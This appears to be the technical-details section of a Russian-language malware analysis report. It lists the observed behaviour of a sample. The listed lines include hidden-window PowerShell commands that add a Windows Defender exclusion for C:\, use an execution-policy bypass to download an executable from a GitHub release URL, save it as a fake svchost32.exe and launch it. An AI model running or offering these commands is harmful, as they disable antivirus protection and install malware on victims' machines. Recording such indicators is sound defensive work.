Техническая информация
- https://github.com/vortex-clan-community/archives/releases/download/1.0.0/3.exe как %windir%\svchost32.exe
- 'gi##ub.com':443
- DNS ASK gi##ub.com
- '<SYSTEM32>\cmd.exe' /k powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /k powershell.exe -exec bypass -windo 1 -noexit -command iex(new-object net.webclient).DownloadFile('https://github.com/VorteX-Clan-Community/Archives/releases/download/1.0.0/3.exe','%WINDIR%\s...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /k start %WINDIR%\svchost32.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /k powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'
- '<SYSTEM32>\cmd.exe' /k powershell.exe -exec bypass -windo 1 -noexit -command iex(new-object net.webclient).DownloadFile('https://github.com/VorteX-Clan-Community/Archives/releases/download/1.0.0/3.exe','%WINDIR%\s...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\'
- '<SYSTEM32>\cmd.exe' /k start %WINDIR%\svchost32.exe